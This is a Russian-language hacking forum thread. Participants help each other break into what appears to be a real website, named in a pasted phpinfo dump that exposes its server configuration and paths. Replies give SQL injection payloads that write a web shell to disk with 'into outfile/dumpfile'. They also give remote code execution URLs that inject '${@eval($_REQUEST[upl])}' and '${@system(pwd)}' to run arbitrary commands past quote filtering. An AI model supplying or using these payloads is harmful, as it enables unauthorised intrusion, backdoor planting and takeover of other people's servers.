![]() |
Всем приветик.
Нашёл сайтик там в одной и формы есть уязвимость PHP код:
phpinfo .SpoilerTarget" type="button">Spoiler PHP Version 5.3.3-7+squeeze19 Directive Local Value Master Value allow_call_time_pass_reference Off Off allow_url_fopen On On allow_url_include Off Off always_populate_raw_post_data Off Off arg_separator.input & & arg_separator.output & & asp_tags Off Off auto_append_file no value no value auto_globals_jit On On auto_prepend_file no value no value browscap no value no value default_charset no value no value default_mimetype text/html text/html define_syslog_variables Off Off disable_classes no value no value disable_functions no value no value display_errors On Off display_startup_errors Off Off doc_root no value no value docref_ext no value no value docref_root no value no value enable_dl Off Off error_append_string no value no value error_log no value no value error_prepend_string no value no value error_reporting 0 22527 exit_on_timeout Off Off expose_php On On extension_dir /usr/lib/php5/20090626 /usr/lib/php5/20090626 file_uploads On On highlight.bg #FFFFFF #FFFFFF highlight.comment #FF8000 #FF8000 highlight.default #0000BB #0000BB highlight.html #000000 #000000 highlight.keyword #007700 #007700 highlight.string #DD0000 #DD0000 html_errors Off Off ignore_repeated_errors Off Off ignore_repeated_source Off Off ignore_user_abort Off Off implicit_flush Off Off include_path /var/www/kuzov-mag.ru/data/www/kuzov-mag.ru/netcat/require/lib/ .:/usr/share/php:/usr/share/pear log_errors On On log_errors_max_len 1024 1024 magic_quotes_gpc On Off magic_quotes_runtime Off Off magic_quotes_sybase Off Off mail.add_x_header On On mail.force_extra_parameters no value no value mail.log no value no value max_execution_time 1000 600 max_file_uploads 20 20 max_input_nesting_level 64 64 max_input_time 60 60 max_input_vars 5000 5000 memory_limit 1048576000 512M open_basedir /var/www/kuzov-mag.ru/data:. no value output_buffering 4096 4096 output_handler no value no value post_max_size 100M 100M precision 14 14 realpath_cache_size 4096k 4096k realpath_cache_ttl 120 120 register_argc_argv Off Off register_globals Off Off register_long_arrays Off Off report_memleaks On On report_zend_debug On On request_order GP GP safe_mode Off Off safe_mode_exec_dir no value no value safe_mode_gid Off Off safe_mode_include_dir no value no value sendmail_from no value no value sendmail_path /usr/sbin/sendmail -t -i -f webmaster@kuzov-mag.ru /usr/sbin/sendmail -t -i serialize_precision 100 100 short_open_tag On On SMTP localhost localhost smtp_port 25 25 sql.safe_mode Off Off track_errors Off Off unserialize_callback_func no value no value upload_max_filesize 100M 100M upload_tmp_dir /var/www/kuzov-mag.ru/data/mod-tmp no value user_dir no value no value user_ini.cache_ttl 300 300 user_ini.filename .user.ini .user.ini variables_order GPCS GPCS xmlrpc_error_number 0 0 xmlrpc_errors Off Off y2k_compliance On On zend.enable_gc On On и ещё, через sql inj заливаю шел, шел заливается, но файл пустой использую такую команду PHP код:
|
А пробовал так:
union select null,null,(hex()),null,....,null into dumpfile /ful_path/writable_dir/shell.php union select null,null,(hex()),null,....,null into outfile /ful_path/writable_dir/shell.php |
а ты попробуй. У меня только две идеи , конвертировать в АССКи и заливать в временную папку, потом копировать.Больше идей нету (((
|
а я бы тоже попробовал, только сайта нет. и кстати, вы уже большие и можете писать в раздел уязвимостей в ветку вопросов
|
Цитата:
|
с RCE все просто: там фильтровались кавычки, но нам они и не нужны.
делаем запрос: Код:
http://www.site.ru/search/?action=index&text=$${@eval($_REQUEST[upl])}Код:
Код:
http://www.site.ru/search/?action=index&text=$${@system(pwd)}P. S. при создании темы делайте название более информативным |
Цитата:
|
PHP код:
|
Цитата:
|
Цитата:
|
| Время: 23:43 |